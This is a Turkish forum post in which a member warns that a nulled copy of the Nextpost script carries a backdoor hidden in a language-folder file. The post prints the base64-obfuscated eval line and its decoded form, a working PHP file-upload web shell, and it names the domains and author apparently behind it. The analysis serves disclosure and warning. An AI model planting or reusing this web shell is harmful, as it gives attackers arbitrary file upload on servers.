- Katılım
- 30 Eki 2016
- Mesajlar
- 6,294
- Beğeniler
- 10
- Puanları
- 18,020
- Konum
- Zonguldak
- Ad Soyad
- Turhan Karabulut
- Meslek
- Emlak
- Yaş
- 45
Selam Arkadaşlar
Bir arkadaşımızın kullanmış olduğu script (Nextpost) yüzünden kısacası "Nulled Maceresı" ile başlar ve sıra bana gelince şöyle detaylıca bir inceleme yapınca bakın neler buldum.
Umarım siz değerli üyeler ve yetkililer keyifle okur
\locale\hi-IN\uploadController.php klasöründe ki dosyaya eklenmiş gizli bir şekilde. Dil dosyalarının arasında gizlemiş
Decode Ettiğimizde Sonuç;
Peki nereye gidiyor bunlar
Yapımcı olarak birde neler eklemiş ona bakalım
Sonuç olarak; evet bu arkadaş aramızda Kendiside bu işi yaparak TİCARET yapmaya çalışıyor Malum kullanıcıyı etiket ve tam ismini girmedim. Yönetici arkadaşlar talep ederse özelden verebilirim.
Umuyorum ki her birey emeğe saygılı, herşey para diyerek, herşey mübahtır demeyen bir nesil olmak dileğiyle sağlıcakla.
Bir arkadaşımızın kullanmış olduğu script (Nextpost) yüzünden kısacası "Nulled Maceresı" ile başlar ve sıra bana gelince şöyle detaylıca bir inceleme yapınca bakın neler buldum.
Umarım siz değerli üyeler ve yetkililer keyifle okur
\locale\hi-IN\uploadController.php klasöründe ki dosyaya eklenmiş gizli bir şekilde. Dil dosyalarının arasında gizlemiş
Kod:
Kod
1
<?php eval(base64_decode("ZWNobyAiPGI+Ii5waHBfdW5hbWUoKS4iPC9iPiI7IA0KZWNobyAiPGJyPjxicj4iOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7DQoJZWNobyAnPGI+WXVrbGVtZSBCYXNhcmlsaTwvYj48YnI+PGJyPic7IA0KCX0NCn0="));?>Decode Ettiğimizde Sonuç;
Kod:
Kod
1
2
3
4
5
6
7
8
9
echo "<b>".php_uname()."</b>";
echo "<br><br>";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Yukleme Basarili</b><br><br>';
}
}
Kod:
Kod
1
2
http://beta.takipciartirma.com/editor/");
https://takipciartirma.com
Kod:
Kod
1
2
"author" => "Muzaffer Şaxxx",
"author_uri" => "https://takipciartirma.com",Umuyorum ki her birey emeğe saygılı, herşey para diyerek, herşey mübahtır demeyen bir nesil olmak dileğiyle sağlıcakla.